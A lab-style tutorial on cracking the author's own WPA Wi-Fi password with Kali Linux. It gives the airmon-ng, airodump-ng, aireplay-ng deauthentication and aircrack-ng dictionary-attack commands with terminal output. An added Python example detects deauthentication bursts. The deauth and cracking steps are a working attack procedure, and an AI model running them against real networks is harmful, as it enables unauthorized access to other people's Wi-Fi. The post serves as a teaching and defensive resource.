First Experience Cracking a Wireless Network Password


Lab setup

Prepare a router, a wireless card that can be put into monitor mode, and Kali Linux

The basic information of the Wi-Fi cracked in this experiment is as follows:

Finding the Wi-Fi networks in the current environment

1. Check the current operating mode of the wireless card

iwconfig wlan0

For example:

┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

2. Put the card into monitor mode

When switching to monitor mode, airmon-ng warns that some interfering processes need to be killed; running airmon-ng check kill will kill them

sudo airmon-ng start wlan0

As shown below, after switching to monitor mode wlan0 becomes wlan0mon

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
[sudo] shelmean 的密碼:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  411 NetworkManager
  576 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           mt76x2u         MediaTek Inc. MT7612U 802.11a/b/g/n/ac
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

┌──(shelmean㉿kali)-[~]
└─$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8  bytes 400 (400.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 400 (400.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 8C-88-2B-10-04-16-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 1821  bytes 574539 (561.0 KiB)
        RX errors 0  dropped 1821  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0mon
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

3. Kill the interfering processes

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng check kill 

Killing these processes:

  PID Name
  576 wpa_supplicant

4. Scan for nearby Wi-Fi

sudo airodump-ng wlan0mon

Capturing the four-way handshake

1. Capture frames from one specific wireless network only

sudo airodump-ng -c 6 --bssid 24:6F:8C:80:16:60 -w mercury.cap wlan0mon

The test Wi-Fi is ABC-Mercury-2.4G; the scan shows its BSSID is 24:6F:8C:80:16:60 and its channel is 6

The captured frames are saved under the prefix mercury.cap (airodump-ng appends a sequence number, which is why the file is later read as mercury.cap-01.cap)

Two stations are currently connected; 9C:28:F7:9A:1B:14 is the MAC of my own phone

2. Kick the station offline

To capture the four-way handshake, open a new terminal and use the aireplay-ng attack tool to deauthenticate the station

aireplay-ng -0 5 -a 24:6F:8C:80:16:60 -c 9C:28:F7:9A:1B:14  wlan0mon

Then wait for the phone to reconnect; you can see that the handshake has been captured

3. Run the dictionary

rockyou.txt is the dictionary file

aircrack-ng -w rockyou.txt -b 24:6F:8C:80:16:60 mercury.cap-01.cap

In just a few minutes it found our router's password
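The deauthentication burst in step 2 of the handshake capture is also the signal a wireless IDS watches for. As an added example (not from the original post), here is a stdlib-only Python detector that decodes raw 802.11 frame-control headers and flags any BSSID that sees a burst of deauth/disassoc frames within a short window; the capture is constructed inline from the BSSID and station MAC in the post, and the threshold and window values are assumptions.

```python
from collections import defaultdict, deque

# Frame-control (type, subtype) pairs for the management frames aireplay-ng -0 sends.
DEAUTH = (0, 12)
DISASSOC = (0, 10)

def parse_header(frame: bytes):
    """Decode type, subtype and the three addresses of a raw 802.11 MAC header."""
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    return ftype, subtype, a1, a2, a3

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)

def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))

def build_frame(ftype, subtype, a1, a2, a3, body=b""):
    """Assemble a minimal 802.11 frame: FC, duration, 3 addresses, seq-ctl, body."""
    fc = bytes([(subtype << 4) | (ftype << 2), 0x00])
    return fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body

def detect_deauth_burst(capture, threshold=4, window=2.0):
    """capture: iterable of (timestamp_seconds, frame_bytes). Returns {bssid: peak}
    for BSSIDs with >= threshold deauth/disassoc frames inside any window-second span.
    threshold and window are assumed tuning values, not IDS defaults."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, frame in sorted(capture, key=lambda p: p[0]):
        ftype, subtype, a1, a2, a3 = parse_header(frame)
        if (ftype, subtype) not in (DEAUTH, DISASSOC):
            continue
        bssid = mac_str(a3)            # addr3 carries the BSSID in management frames
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(q))
    return alerts

# Constructed sample capture using the BSSID and station MAC from the post above.
AP = mac_bytes("24:6F:8C:80:16:60")
STA = mac_bytes("9C:28:F7:9A:1B:14")
REASON_CLASS3 = b"\x07\x00"   # reason code 7: class 3 frame received from non-associated STA
SAMPLE_CAPTURE = [
    (0.00, build_frame(0, 8, b"\xff" * 6, AP, AP)),   # beacon: benign
    (0.50, build_frame(2, 0, AP, STA, AP)),           # data frame: benign
] + [(1.0 + i * 0.1, build_frame(0, 12, STA, AP, AP, REASON_CLASS3)) for i in range(5)]
# detect_deauth_burst(SAMPLE_CAPTURE) -> {'24:6F:8C:80:16:60': 5}
```

Two isolated deauths several seconds apart (a client roaming away) fall outside the window and do not alert, which is the distinction between normal churn and the burst used above.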
